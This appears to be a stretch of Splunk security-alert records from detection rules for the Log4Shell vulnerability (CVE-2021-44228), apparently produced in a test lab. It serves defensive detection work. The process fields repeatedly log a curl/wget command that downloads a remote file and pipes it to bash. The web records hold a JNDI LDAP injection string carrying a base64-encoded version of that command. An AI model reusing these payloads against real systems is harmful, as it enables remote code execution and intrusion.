annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643916, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642643654, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="DE.CM", annotations._all="T1190", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="PR.DS", annotations._all="CVE-2021-44228", annotations._all="PR.PT", annotations._all="Command and Control", annotations._all="Stage:Initial Access", annotations._all="T1059", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642643652, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="Exploitation", annotations._all="CIS 16", annotations._all="Source:Application Log", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Reconnaissance", annotations._all="DE.CM", annotations._all="CIS 5", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642643654, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="CIS 13", annotations._all="DE.CM", annotations._all="T1190", annotations._all="CIS 12", annotations._all="Source:Endpoint", annotations._all="PR.DS", annotations._all="CVE-2021-44228", annotations._all="PR.PT", annotations._all="Command and Control", annotations._all="Stage:Initial Access", annotations._all="T1059", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642643652, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="Exploitation", annotations._all="CIS 16", annotations._all="Source:Application Log", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Reconnaissance", annotations._all="DE.CM", annotations._all="CIS 5", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="Stage:Execution", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642643616, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in 